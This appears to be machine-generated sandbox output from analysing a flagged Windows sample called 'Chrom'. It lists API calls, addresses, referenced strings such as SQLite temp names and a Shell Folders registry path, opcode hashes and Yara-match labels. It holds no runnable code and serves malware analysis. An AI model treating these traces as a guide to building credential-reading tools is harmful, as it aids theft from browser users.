• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004052C9
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A647
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A673
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A688
• wcscpy.MSVCRT ref: 0040A698
• wcscat.MSVCRT ref: 0040A6A5
• wcscat.MSVCRT ref: 0040A6B4
• wcscpy.MSVCRT ref: 0040A6C6
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
APIs
  • Part of subcall function 00407670: FreeLibrary.KERNEL32(?,004075D1,00000000,00000000,?,0040B908,?,00000000,?), ref: 00407678
  • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
  • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
  • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
  • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
  • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
• GetProcAddress.KERNEL32(?,00000000), ref: 004075FC
• GetProcAddress.KERNEL32(?,00000000), ref: 00407610
• GetProcAddress.KERNEL32(?,00000000), ref: 00407623
• GetProcAddress.KERNEL32(?,00000000), ref: 00407637
• GetProcAddress.KERNEL32(?,00000000), ref: 0040764B
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• API String ID: 2012295524-4050573280
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006
Strings
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040FBC2
• <?xml version="1.0" ?>, xrefs: 0040FBBB
• <%s>, xrefs: 0040FBE5
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
APIs
• wcscpy.MSVCRT ref: 004465EB
• wcscat.MSVCRT ref: 004465FA
• wcscat.MSVCRT ref: 0044660B
• wcscat.MSVCRT ref: 0044661A
• VerQueryValueW.VERSION(?,?,00000000,?), ref: 00446634
  • Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
  • Part of subcall function 00409F85: memcpy.MSVCRT(?,?,000000FF,?,00446651,00000000,?,?,?,00000000,?), ref: 00409FA2
  • Part of subcall function 0040A04F: lstrcpyW.KERNEL32(?,?,00446659,?,?,?,00000000,?), ref: 0040A064
  • Part of subcall function 0040A04F: lstrlenW.KERNEL32(?), ref: 0040A06B
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                        • String ID: \StringFileInfo\
                                                                                                                                                        • API String ID: 393120378-2245444037
                                                                                                                                                        • Opcode ID: d4165d7f50266fa13a5b531a4f01ad866930043b5560520190855b71b76da5e1
                                                                                                                                                        • Instruction ID: ad7517ef6bb7be25d6ac765d434d23ce8d777cc6758ad1086d9e8c390f57c567
                                                                                                                                                        • Opcode Fuzzy Hash: d4165d7f50266fa13a5b531a4f01ad866930043b5560520190855b71b76da5e1
                                                                                                                                                        • Instruction Fuzzy Hash: F3019A72A00209A6DB50AAA1CC06DDF77ACAB05304F0105BBB954E2013EE38DB869A5A
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintfwcscpy
                                                                                                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                        • API String ID: 999028693-502967061
                                                                                                                                                        • Opcode ID: 2d27ce870dcdc0356c472e238f6887c9b469fb6313562511eb920d5e3df5e042
                                                                                                                                                        • Instruction ID: 49826c5e287938e985e88a530ad471c797b7a96a0663e00b3f963554c3d6ef55
                                                                                                                                                        • Opcode Fuzzy Hash: 2d27ce870dcdc0356c472e238f6887c9b469fb6313562511eb920d5e3df5e042
                                                                                                                                                        • Instruction Fuzzy Hash: 5CE04F31F9D30071E82421D20D02B5A26608AA5B2AFB14867FD06B41E3E1BD859D5C0F
                                                                                                                                                        APIs
                                                                                                                                                        • memchr.MSVCRT ref: 0044636A
                                                                                                                                                        • memcpy.MSVCRT(?,0044F98C,0000000B,?,?,?,00000000,00000000,00000000), ref: 0044640E
                                                                                                                                                        • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00446420
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00446448
                                                                                                                                                        • memcpy.MSVCRT(?,0044F98C,0000000B), ref: 0044645A
                                                                                                                                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 0044646C
                                                                                                                                                        • memcpy.MSVCRT(0044659A,?,00000008,?,?), ref: 004464BB
                                                                                                                                                        • memset.MSVCRT ref: 00446509
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memchrmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1581201632-0
                                                                                                                                                        • Opcode ID: 4d233e4afd6ff29041f3c6f611680654f4aa68e75756faee7c9936c8c726fefb
                                                                                                                                                        • Instruction ID: a6c008d970df26256353228000b1674c0094f59a7a9bfa7c7c5a6d2f045070f8
                                                                                                                                                        • Opcode Fuzzy Hash: 4d233e4afd6ff29041f3c6f611680654f4aa68e75756faee7c9936c8c726fefb
                                                                                                                                                        • Instruction Fuzzy Hash: 3A5106719002186BDF10EF64DC81EEEBBB9AF05304F05486BF555D3246E738EA44CBA5
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.MSVCRT ref: 00404765
                                                                                                                                                          • Part of subcall function 00404683: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 004046AF
                                                                                                                                                        • memset.MSVCRT ref: 004047B1
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 004047C4
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 004047D7
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 0040481D
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00404830
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 0040485D
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00404872
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memsetstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2350177629-0
                                                                                                                                                        • Opcode ID: 85ae6cca462db74fc9d517c8532b09502b655fda8b3ede5b79185c6b0435583b
                                                                                                                                                        • Instruction ID: d0b86a8e0b1ed09a54c1958bd2773174a4505737e3a5990953cddb4a85005ec9
                                                                                                                                                        • Opcode Fuzzy Hash: 85ae6cca462db74fc9d517c8532b09502b655fda8b3ede5b79185c6b0435583b
                                                                                                                                                        • Instruction Fuzzy Hash: 4351F3B290050DBEEB41DAE8CC41FDFB7BDAB09304F014475F708E6151E6759A498BA6
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                        • API String ID: 2221118986-1606337402
                                                                                                                                                        • Opcode ID: b08f1c7c1c784f11e339bc558d21b342480e82a29914c690e576521ecfd1ee8c
                                                                                                                                                        • Instruction ID: 5991db5cdfe02a92001a53b2659b7cff3bc1ad689f245b1de322542099a0f38c
                                                                                                                                                        • Opcode Fuzzy Hash: b08f1c7c1c784f11e339bc558d21b342480e82a29914c690e576521ecfd1ee8c
                                                                                                                                                        • Instruction Fuzzy Hash: BE818D716083219FCB10CF15E48161FBBE1BF94314F95886FE88897292D378ED44CB9A
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040B7D1: free.MSVCRT ref: 0040B7D4
                                                                                                                                                          • Part of subcall function 0040B7D1: free.MSVCRT ref: 0040B7DC
                                                                                                                                                          • Part of subcall function 00416466: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00416C27,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,004148A8,?,?,00000000), ref: 00416479
                                                                                                                                                          • Part of subcall function 0040AFF4: free.MSVCRT ref: 0040B003
                                                                                                                                                        • memset.MSVCRT ref: 0040C8E7
                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C915
                                                                                                                                                        • _wcsupr.MSVCRT ref: 0040C92F
                                                                                                                                                          • Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF2E
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF51
                                                                                                                                                          • Part of subcall function 0040AEF6: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
                                                                                                                                                        • memset.MSVCRT ref: 0040C97E
                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C9A9
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C9B6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4131475296-0
                                                                                                                                                        • Opcode ID: d30ab4aae847c2bab66a724a932e69195760680e6f4ba13dddd40aab1fe6d2e6
                                                                                                                                                        • Instruction ID: 00aa335d5cf85b89362f6a9aadfcc732b8efce75ac460415b761aff3ddc3b274
                                                                                                                                                        • Opcode Fuzzy Hash: d30ab4aae847c2bab66a724a932e69195760680e6f4ba13dddd40aab1fe6d2e6
                                                                                                                                                        • Instruction Fuzzy Hash: FA41EFB2D00119BBDB10EF95DC85AEFB7BCEF48304F10417AB514F6191D7749A448BA5
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFilefreememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2507021081-0
                                                                                                                                                        • Opcode ID: 3f26cb4930ba2ae58a9a28ad6dda560801c2adcc14f28edc482860ed1ce7c104
                                                                                                                                                        • Instruction ID: 7395bd2a308086f3fd2d4c6b452b5aa1ac1e70db218c9d4fbfcd5f8a884c914b
                                                                                                                                                        • Opcode Fuzzy Hash: 3f26cb4930ba2ae58a9a28ad6dda560801c2adcc14f28edc482860ed1ce7c104
                                                                                                                                                        • Instruction Fuzzy Hash: B2110A7290A119FBDB21AFA48C809FF33AAEB45354B51013BF915E2284D6388DD5926F
                                                                                                                                                        APIs
                                                                                                                                                        • AreFileApisANSI.KERNEL32 ref: 00419453
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00419471
                                                                                                                                                        • malloc.MSVCRT ref: 0041947B
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00419492
                                                                                                                                                        • free.MSVCRT ref: 0041949B
                                                                                                                                                        • free.MSVCRT ref: 004194B9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4131324427-0
                                                                                                                                                        • Opcode ID: fd694bdbf1a5288751afab5916eb464ac1068d8597691c81853ece6260929c55
                                                                                                                                                        • Instruction ID: d2ec6eabaf1a5e80c3afeaedd941492bb30a106db416a89a7fee490f69d676c2
                                                                                                                                                        • Opcode Fuzzy Hash: fd694bdbf1a5288751afab5916eb464ac1068d8597691c81853ece6260929c55
                                                                                                                                                        • Instruction Fuzzy Hash: 5E01D472609125BBAB116AA59C01DEF379CDF463747210336FC15E3280EA28CD4242BD
                                                                                                                                                        APIs
                                                                                                                                                        • GetTempPathW.KERNEL32(000000E6,?,?,00419CBA), ref: 0041A132
                                                                                                                                                        • GetTempPathA.KERNEL32(000000E6,?,?,00419CBA), ref: 0041A15A
                                                                                                                                                        • free.MSVCRT ref: 0041A182
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PathTemp$free
                                                                                                                                                        • String ID: %s\etilqs_$etilqs_
                                                                                                                                                        • API String ID: 924794160-1420421710
                                                                                                                                                        • Opcode ID: bab2ed1f527ee8a656d929be1b160a4a852a5d62a151918d7f1c5c0f436632ca
                                                                                                                                                        • Instruction ID: 86187f938b98f06affb9dfa87fa418505d5dbd7a5a9bd49ee38ced054dacd9ce
                                                                                                                                                        • Opcode Fuzzy Hash: bab2ed1f527ee8a656d929be1b160a4a852a5d62a151918d7f1c5c0f436632ca
                                                                                                                                                        • Instruction Fuzzy Hash: 8E312831A092496AE725A765DC41BFF73A89B54308F1404BFE846C2283EF7C9EC5865E
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00411649
                                                                                                                                                          • Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194
                                                                                                                                                        • wcsrchr.MSVCRT ref: 00411667
                                                                                                                                                        • wcscat.MSVCRT ref: 00411681
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                        • String ID: .cfg$General
                                                                                                                                                        • API String ID: 776488737-1188829934
                                                                                                                                                        • Opcode ID: 05d865f8f1fbf1afa81b1740172245d7630aa72eb646d50dbed4ba79973170d9
                                                                                                                                                        • Instruction ID: 118cea2e70e189b156e6f7c6b3a683fd49b902604a6a275d9fc0e819739e64fb
                                                                                                                                                        • Opcode Fuzzy Hash: 05d865f8f1fbf1afa81b1740172245d7630aa72eb646d50dbed4ba79973170d9
                                                                                                                                                        • Instruction Fuzzy Hash: E711933250121C6ADB10EF51CC85ACA7368BF54714F1404EBE908AB142D775ABD88B99
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040F90E
                                                                                                                                                          • Part of subcall function 00416DE5: memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,0040F92F,?,?,?,<item>), ref: 00416E62
                                                                                                                                                          • Part of subcall function 0040F0F7: wcscpy.MSVCRT ref: 0040F0FC
                                                                                                                                                          • Part of subcall function 0040F0F7: _wcslwr.MSVCRT ref: 0040F137
                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040F958
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                        • API String ID: 1775345501-2769808009
                                                                                                                                                        • Opcode ID: 795fdbf1178cbb4566f4ded2e51011bbdab7768b91a9f779536e95c46b73b6be
                                                                                                                                                        • Instruction ID: e757c57b7439aa271c71178676e27b4ad6085045d172985a4d63abbb6152d9b4
                                                                                                                                                        • Opcode Fuzzy Hash: 795fdbf1178cbb4566f4ded2e51011bbdab7768b91a9f779536e95c46b73b6be
                                                                                                                                                        • Instruction Fuzzy Hash: D611C435600309BBDB21AF29CC82E997B25FF04708F10007AF90467A93C339F968DB88
                                                                                                                                                        APIs
                                                                                                                                                        • wcscpy.MSVCRT ref: 00416653
                                                                                                                                                        • wcscpy.MSVCRT ref: 0041666E
                                                                                                                                                        • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,004116BA,?,General,?,00000000,00000001), ref: 00416695
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041669C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                        • String ID: General
                                                                                                                                                        • API String ID: 999786162-26480598
                                                                                                                                                        • Opcode ID: ed3c1823b04d3e0c62bd7214a39938c8b74bf6441286b00033080fb2913483c2
                                                                                                                                                        • Instruction ID: f01d66d13555934190104f6a09e645eb52914f374063e62784237bdfd735f1bc
                                                                                                                                                        • Opcode Fuzzy Hash: ed3c1823b04d3e0c62bd7214a39938c8b74bf6441286b00033080fb2913483c2
                                                                                                                                                        • Instruction Fuzzy Hash: 2CF059B3109300BFF7206B619C85EAB77DCDF40318F12883FF04891141CA398C94866E
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040DBC8
                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(0045E668,?,0044F4CC,?,00001000,0045E458), ref: 0040DBF0
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(0045E668,?,?,0045E458), ref: 0040DC12
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: PrivateProfileString$Writememset
• String ID: XE$hE
• API String ID: 747731527-2175974288
• Opcode ID: ede71be8cfb000d6f647e9b079099f0124216ddcdab21ee2ea2fb028081f9ff6
• Instruction ID: 3f24a6620cd36916ca3736dea7931fee652e2a6ad1dc5343ab1a7f2c6f25142e
• Opcode Fuzzy Hash: ede71be8cfb000d6f647e9b079099f0124216ddcdab21ee2ea2fb028081f9ff6
• Instruction Fuzzy Hash: 81F06836950354FAFB115B51CC4DFCB3B68EB55755F004076FB04A1182D7B88A48C6AD
APIs
• GetLastError.KERNEL32(00000000,?,004101B0,00000000,?,004122A5,00000000,00000000,?,00000000,00000000,00000000), ref: 00409D0F
• _snwprintf.MSVCRT ref: 00409D3C
• MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409D55
Strings
Memory Dump Source
